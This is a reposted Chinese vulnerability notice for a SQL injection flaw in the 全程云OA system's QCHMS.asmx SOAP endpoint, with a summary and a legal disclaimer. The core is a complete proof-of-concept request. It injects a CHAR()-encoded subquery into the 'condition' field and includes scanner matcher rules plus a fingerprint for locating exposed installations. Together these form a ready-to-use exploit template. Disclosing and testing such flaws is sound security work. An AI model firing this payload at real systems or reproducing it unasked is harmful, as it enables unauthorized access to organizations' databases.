文章总结: 本文披露全程云OA系统QCHMS.asmx接口存在SQL注入漏洞(VEID-2026-11106),攻击者可利用该漏洞获取数据库信息或权限。文章提供了完整的POC代码、空间测绘特征body=images/yipeoplehover.png以及本地复现步骤,具有较高的可操作性。但缺少漏洞原理深度分析和修复建议,适合安全测试人员参考使用。 综合评分: 77 文章分类: 漏洞分析,漏洞POC,漏洞预警,WEB安全
本地漏洞环境复现
Veil POC
POST /OA/HMS/QCHMS.asmx HTTP/1.1Host: {{Hostname}}User-Agent: {{random_ua}}SOAPAction: "http://tempuri.org/GetProjectResumeList"Content-Type: text/xml; charset=utf-8
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetProjectResumeList xmlns="http://tempuri.org/"> <pageIndex>1</pageIndex> <pageSize>20</pageSize> <condition> AND 1078 IN (SELECT CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(111)+CHAR(32)+CHAR(118)+CHAR(101)+CHAR(105)+CHAR(108))</condition> </GetProjectResumeList> </soap:Body></soap:Envelope>
#@ condition: and#@ matcher: body contains "'hello veil'"#@ matcher: status_code == 500
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:H4ll0 H4ck3r 老谢 老谢《[漏洞复现]全程云OA QCHMS.asmx SQL注入漏洞(VEID-2026-11106)》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
![[漏洞复现]全程云OAQCHMS.asmxSQL注入漏洞(VEID-2026-11106)](/images/random/titlepic/1.jpg)
评论